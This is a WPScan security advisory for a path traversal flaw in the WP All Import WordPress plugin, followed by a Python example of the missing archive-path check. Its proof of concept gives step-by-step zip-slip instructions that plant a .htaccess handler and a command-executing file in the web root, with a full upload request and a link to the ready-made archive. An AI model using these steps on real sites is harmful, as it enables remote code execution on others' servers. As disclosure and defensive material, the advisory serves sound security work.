Source: wpvulndb
Author: Lucy
WPVDB-ID: 11E73C23-FF5F-42E5-A4B0-0971652DCEA1
History: Oct 14, 2022 - 12:00 a.m.

WP All Import < 3.6.9 - Admin+ Directory traversal via file upload

Published: 2022-10-14 00:00:00
Reporter: lucy
Source: wpscan.com

EPSS: 0.001 (Low)
EPSS Percentile: 35.8%

The plugin is not validating the paths of files contained in uploaded zip archives, allowing highly privileged users, such as admins, to write arbitrary files to any part of the file system accessible by the web server via a path traversal vector.

PoC

[1] Download 'poc.zip' via 'https://github.com/lucy-official/TIL/raw/main/Security/Test Files/Zipslip/poc.zip'.
    poc.zip contains 2 files like below:
    -> '../../../../../../../../../../var/www/html/exploit.php.txt'
    -> '../../../../../../../../var/www/html/.htaccess'

[1-1] '../../../../../../../../../../var/www/html/exploit.php.txt' is as follows.
    ----------------------------------
    ----------------------------------

[1-2] '../../../../../../../../var/www/html/.htaccess' is as follows.
    ----------------------------------
    [same as the existing .htaccess data]
    AddHandler application/x-httpd-php .php .html
    ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'.

[3] Access 'http://localhost/exploit.php.txt?cmd=id' in order to execute arbitrary commands.

[+++] PoC Request Packet Sample

    POST /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=afb6fb6e5c HTTP/1.1
    Host: localhost
    Content-Length: 1333
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu
    Accept: */*
    Origin: http://localhost
    Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: [wordpress-admin-cookie]
    Connection: close

    ------WebKitFormBoundaryrhApgY7BhUu88AGu
    Content-Disposition: form-data; name="name"

    poc.zip
    ------WebKitFormBoundaryrhApgY7BhUu88AGu
    Content-Disposition: form-data; name="chunk"

    0
    ------WebKitFormBoundaryrhApgY7BhUu88AGu
    Content-Disposition: form-data; name="chunks"

    1
    ------WebKitFormBoundaryrhApgY7BhUu88AGu
    Content-Disposition: form-data; name="async-upload"; filename="poc.zip"
    Content-Type: application/zip

    [poc.zip payload] [ - you can download it via 'https://github.com/lucy-official/TIL/raw/main/Security/Test Files/Zipslip/poc.zip']
    ------WebKitFormBoundaryrhApgY7BhUu88AGu--
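The check the plugin lacked, as an added Python illustration (not WP All Import's own code, which is PHP): every member name in the archive is resolved against the destination directory before anything is written, and an archive with even one escaping member is refused as a whole. The archive contents, member names and the destination path below are constructed for the example and mirror the two-file layout the PoC describes.

```python
import io
import os
import posixpath
import zipfile


def _escapes(dest: str, name: str) -> bool:
    """True if archive member `name` would be written outside `dest`."""
    # Backslashes count as separators too: a crafted name may use them, and
    # the extraction library may not treat them the way this check does.
    normalized = name.replace("\\", "/")
    # Absolute paths (POSIX "/..." or a Windows drive "C:/...") always escape.
    if posixpath.isabs(normalized) or (len(normalized) > 1 and normalized[1] == ":"):
        return True
    dest_real = os.path.realpath(dest)
    # realpath collapses the "../" segments and follows symlinks under dest, so a
    # symlinked subdirectory that points outside dest is caught as well.
    target = os.path.realpath(os.path.join(dest_real, *normalized.split("/")))
    return os.path.commonpath([dest_real, target]) != dest_real


def unsafe_entries(zip_bytes: bytes, dest: str) -> list[str]:
    """Names of members whose path escapes dest; an empty list means the archive is clean."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [i.filename for i in zf.infolist() if _escapes(dest, i.filename)]


def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Reject the whole archive if any member escapes dest; otherwise extract it."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"archive rejected, traversal entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        # The explicit check above is the gate; do not rely on whatever name
        # sanitizing the extraction library happens to do.
        zf.extractall(dest)
        return zf.namelist()


def build_archive(members: dict[str, bytes]) -> bytes:
    """Build an in-memory zip (constructed test input, not the advisory's poc.zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed archive with the member layout the PoC describes, plus one benign file.
POC_LIKE = build_archive({
    "../../../../../../../../../../var/www/html/exploit.php.txt": b"<?php /* constructed placeholder */ ?>",
    "../../../../../../../../var/www/html/.htaccess": b"AddHandler application/x-httpd-php .php .html\n",
    "import.xml": b"<items/>",
})
```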

CPE
Name            Operator   Version
wp-all-import   lt         3.6.9

